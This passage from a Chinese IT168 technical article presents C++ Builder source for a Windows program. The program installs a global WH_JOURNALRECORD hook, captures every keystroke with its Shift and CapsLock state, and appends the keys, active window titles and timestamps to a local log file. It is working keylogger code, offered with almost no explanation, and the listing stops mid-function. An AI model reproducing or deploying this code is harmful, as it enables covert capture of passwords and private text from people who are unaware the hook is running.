【IT168技术文档】
日志钩子代码如下,你慢慢品味吧:
//-----------.cpp文件 //--------------------------------------------------------------------------- #include <vcl.h> #include <stdio.h> #pragma hdrstop #include "KeyHookU.h" //--------------------------------------------------------------------------- #pragma package(smart_init) #pragma resource "*.dfm" TfrmLogHook *frmLogHook; HOOKPROC JournalLogProc(int iCode,WPARAM wParam,LPARAM lParam); //钩子变量 HHOOK g_hLogHook=NULL; //记录上一次得到焦点的窗口句柄 HWND g_hLastFocus=NULL; //键盘掩码变量 const int KeyPressMask=0x80000000; //保存上一次按键值 //char g_PrvChar; //--------------------------------------------------------------------------- __fastcall TfrmLogHook::TfrmLogHook(TComponent* Owner) : TForm(Owner) { } //--------------------------------------------------------------------------- void __fastcall TfrmLogHook::btnInstallClick(TObject *Sender) { if(g_hLogHook==NULL) //安装日志钩子 g_hLogHook=SetWindowsHookEx(WH_JOURNALRECORD,(HOOKPROC)JournalLogProc,HInstance,0); } //--------------------------------------------------------------------------- void __fastcall TfrmLogHook::btnUninstallClick(TObject *Sender) { if(g_hLogHook!=NULL) { UnhookWindowsHookEx(g_hLogHook); g_hLogHook=NULL; } } //--------------------------------------------------------------------------- HOOKPROC JournalLogProc(int iCode,WPARAM wParam,LPARAM lParam) { if(iCode<0)return (HOOKPROC)CallNextHookEx(g_hLogHook,iCode,wParam,lParam); if(iCode==HC_ACTION) { EVENTMSG* pEvt=(EVENTMSG*)lParam; int i; HWND hFocus;//保存当前活动窗口句柄 char szTitle[256];//当前窗口名称 char szTime[128];//当前的日期和时间 FILE* stream=fopen("h:\\usr\\logfile.txt","a+"); if(pEvt->message==WM_KEYDOWN) { int vKey=LOBYTE(pEvt->paramL);//取得虚拟键值 char ch; char str[10]; hFocus=GetActiveWindow(); if(g_hLastFocus!=hFocus) { GetWindowText(hFocus,szTitle,256); g_hLastFocus=hFocus; strcpy(szTime,DateTimeToStr(Now()).c_str()); fprintf(stream,"%c%s%c%c%s",10,szTime,32,32,szTitle); fprintf(stream,"%c%c",32,32); } int iShift=GetKeyState(0x10); int iCapital=GetKeyState(0x14); int iNumLock=GetKeyState(0x90); bool bShift=(iShift&KeyPressMask)==KeyPressMask; bool bCapital=(iCapital&1)==1; bool bNumLock=(iNumLock&1)==1; /* if(vKey==9) //TAB fprintf(stream,"%c",'\t'); if(vKey==13) //回车键 fprintf(stream,"%c",'\n'); */ if(vKey>=48 && vKey<=57) //数字键0-9 { if(!bShift) fprintf(stream,"%c",vKey); else { switch(vKey) { case 49: ch='!'; break; case 50: ch='@'; break; case 51: ch='#'; break; case 52: ch='$'; break; case 53: ch='%'; break; case 54: ch='^'; break; case 55: ch='&'; break; case 56: ch='*'; break; case 57: ch='('; break; case 48: ch=')'; break; } fprintf(stream,"%c",ch); } } if(vKey>=65 && vKey<=90) //A-Z a-z { if(!bCapital) { if(bShift) ch=vKey; else ch=vKey+32; } else if(bShift) ch=vKey+32; else ch=vKey; fprintf(stream,"%c",ch); } if(vKey>=96 && vKey<=105) //小键盘0-9 { if(bNumLock) fprintf(stream,"%c",vKey-96+48); }
